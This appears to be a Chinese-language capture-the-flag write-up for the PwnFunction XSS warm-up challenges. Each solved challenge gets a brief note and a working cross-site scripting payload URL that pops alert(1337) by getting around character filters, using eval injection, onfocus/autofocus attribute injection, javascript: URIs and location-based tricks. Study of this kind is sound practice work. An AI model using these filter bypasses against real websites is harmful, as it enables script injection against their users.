1.Ma Spaghet!
2.Jefff
3.Ugandan Knuckles
4.Ricardo Milos
5.Ah That’s Hawt
7.Mafia
8.Ok,Boomer
1.Ma Spaghet!
该题用到了innerHTML,如果get参数somebody有值就传参,没有就使用默认的somebody
2.Jefff
把jeff传参到eval执行函数中了
https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=aa%22-alert(1337);-%22
3.Ugandan Knuckles
代码过滤了"<“和”>"
加入οnfοcus属性来执行alert()函数,发现能成功,但是需要用户手动点击
添加autofocus
最终成功告警
https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaa" οnfοcus=alert(1337) autofocus="
4.Ricardo Milos
该代码会2秒后自动提交
没有过滤,尝试写入xss代码,警告成功
https://sandbox.pwnfunction.com/warmups/ricardo.html?ricardo=javascript:alert(1337)
5.Ah That’s Hawt
代码过滤了 “[” , “]” , “(” , “)”
将οnerrοr=location后成功警告
https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=<img src=1 οnerrοr=location=“javascript:alert%25281337%2529”>
7.Mafia
过滤了"" , " ’ " , ’ " ', " + " , " - " , " ! " , " \ " , " [ " , " ] ",还有alert
https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=eval(location.hash.slice(1))#alert(1337)
8.Ok,Boomer